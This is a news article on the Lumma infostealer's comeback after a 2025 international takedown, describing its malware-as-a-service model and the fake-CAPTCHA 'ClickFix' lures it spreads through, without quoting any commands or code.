Last May, law enforcement officials around the world achieved a significant victory when they disrupted the infrastructure of Lumma, an infostealer that infected approximately 395,000 Windows computers in just a two-month period, leading to an international operation. Lumma is back “in a big way” once again in a string of difficult-to-detect attacks that steal credentials and sensitive files, researchers said Wednesday.
Lumma, also known as Lumma Stealer, first appeared on Russian-speaking cybercrime forums in 2022. Its cloud-based malware-as-a-service model provided a vast infrastructure of domains to host free cracked software, games, and pirated movies, as well as attractive sites offering command-and-control channels and everything else a threat actor needed to run his infostealing enterprise. Within a year, the Lumma was selling for up to $2,500 for premium versions. As of spring 2024, the FBI counted more than 21,000 listings on crime forums. Last year, Microsoft said Lumma had become the “go-to tool” for many criminal groups, including Scattered Spiders, one of the most prolific groups.
takedowns are hard
The FBI and an international coalition of its counterparts took action early last year. In May, they said they had seized 2,300 domains, the command-and-control infrastructure and crime markets that had enabled Infostealer to flourish. However, the malware has recently made a comeback, allowing it to re-infect a large number of machines.
“Despite a major law-enforcement takedown in 2025 that disrupted thousands of its command-and-control domains, Lummastealer is back at large,” researchers at security firm Bitdefender wrote. “The operation has rapidly rebuilt its infrastructure and is expanding around the world.”
As before with Lumma, the recent surge relies heavily on “clickfixes”, a type of social engineering lure that is proving extremely effective in getting end users to infect their machines. Typically, these types of lures come in the form of fake CAPTCHAs – which require users to click on a box or identify objects or letters in a jumbled image – instructing them to copy text and paste it into an interface, a process that takes only a few seconds. The text comes in the form of malicious commands provided by the fake CAPTCHA. The interface is Windows Terminal. Targets that comply install the Loader malware, which in turn installs Lumma.
<a href